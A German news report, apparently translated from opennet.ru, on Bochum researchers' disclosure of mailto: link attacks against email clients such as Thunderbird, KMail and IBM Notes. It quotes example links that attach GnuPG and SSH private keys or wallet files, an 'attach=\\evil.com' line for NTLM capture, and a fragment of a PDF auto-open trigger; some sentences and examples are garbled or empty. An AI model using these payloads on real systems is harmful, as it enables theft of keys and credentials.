Forscher der Ruhr-Universität Bochum (Deutschland) () das Verhalten von E-Mail-Clients bei der Verarbeitung von «mailto:»-Links mit erweiterten Parametern. Fünf von zwanzig untersuchten E-Mail-Clients waren anfällig für einen Angriff, der Ressourcen durch den Parameter «attach» manipulierte. Weitere sechs E-Mail-Clients waren anfällig für Angriffe durch den Austausch von PGP- und S/MIME-Schlüsseln, während drei Clients für Angriffe zur Extraktion von Inhalten aus verschlüsselten Nachrichten verwundbar waren.
Die Links «» werden verwendet, um das Öffnen des E-Mail-Clients zu automatisieren, um eine E-Mail an die in dem Link angegebene Adresse zu schreiben. Neben der Adresse können in dem Link zusätzliche Parameter wie der Betreff und eine Vorlage für den Standardinhalt angegeben werden. Der vorgeschlagene Angriff manipuliert den Parameter «attach», der es ermöglicht, eine Datei an die zu erstellende E-Mail anzuhängen.
Die E-Mail-Clients Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) und Pegasus Mail sind einer trivialen Attacke ausgesetzt, die es ermöglicht, automatisch eine beliebige lokale Datei anzuhängen, die über einen Link wie „mailto:?attach=pfad_zur_datei“ angegeben wird. Die Datei wird ohne Warnung angehängt, sodass der Benutzer möglicherweise nicht bemerkt, dass die E-Mail mit einem Anhang gesendet wird.
Durch einen Link wie „mailto:?to=user@example.com&subject=Title&body=Text&attach=~/.gnupg/secring.gpg“ können zum Beispiel die privaten Schlüssel von GnuPG in die E-Mail eingefügt werden. Ebenso können Inhalte von Krypto-Wallets (~/.bitcoin/wallet.dat), SSH-Keys (~/.ssh/id_rsa) und beliebige Dateien, auf die der Benutzer Zugriff hat, gesendet werden. Darüber hinaus ermöglicht Thunderbird das Anhängen von Dateigruppen mithilfe von Konstruktionen wie „attach=/tmp/*.txt“.
Neben lokalen Dateien verarbeiten einige E-Mail-Clients Links zu Netzspeichern und Pfaden auf dem IMAP-Server. Insbesondere ermöglicht IBM Notes das Übertragen von Dateien aus einem Netzwerkverzeichnis, indem Links der Art „attach=\\evil.com\dummyfile“ genutzt werden, sowie das Abfangen von NTLM-Authentifizierungsparametern, indem ein Link auf einen vom Angreifer kontrollierten SMB-Server gesendet wird (die Anfrage wird mit den aktuellen Authentifizierungsparametern des Benutzers gesendet).
Thunderbird verarbeitet erfolgreich Anfragen wie „attach=imap:///fetch>UID>/INBOX>1/“, die es ermöglichen, Inhalte aus Ordnern auf dem IMAP-Server anzuhängen. Dabei werden E-Mails, die über OpenPGP und S/MIME verschlüsselt sind, automatisch vom E-Mail-Client vor dem Senden entschlüsselt. Die Entwickler von Thunderbird wurden Thunderbird 78 Das Problem wurde bereits behoben (die Thunderbird-Versionen 52, 60 und 68 sind weiterhin anfällig).
Ältere Versionen von Thunderbird sind auch anfällig für zwei weitere Angriffsvarianten auf PGP und S/MIME, die von Forschern vorgeschlagen wurden. Insbesondere kann ein Schlüsselersatzangriff gegen Thunderbird sowie gegen Outlook, PostBox, eM Client, MailMate und R2Mail2 durchgeführt werden, da der E-Mail-Client automatisch neue Zertifikate importiert und installiert, die in S/MIME-Nachrichten übertragen werden, was es Angreifern ermöglicht, bereits gespeicherte öffentliche Schlüssel des Benutzers zu ersetzen.
Der zweite Angriff, dem Thunderbird, PostBox und MailMate ausgesetzt sind, manipuliert die Eigenschaften des automatischen Speicherung von Entwürfen und ermöglicht es, unter Verwendung von mailto-Parametern die Entschlüsselung von verschlüsselten Nachrichten oder das Hinzufügen einer digitalen Signatur zu beliebigen Nachrichten zu initiieren, wobei das Ergebnis an den IMAP-Server des Angreifers übertragen wird. Der Chiffrat wird über den Parameter „body“ übermittelt, und um den Zugriff auf den IMAP-Server des Angreifers zu initiieren, wird das Tag „meta refresh“ verwendet. Zum Beispiel: ''
Für die automatische Verarbeitung von «mailto:»-Links ohne Benutzerinteraktion können speziell formatierte PDF-Dokumente verwendet werden – die OpenAction-Funktion in PDFs ermöglicht es, den mailto-Handler automatisch beim Öffnen des Dokuments zu starten:
%PDF-1.5
1 0 obj
<>
endobj
2 0 obj
<>
endobj
Quelle: opennet.ru
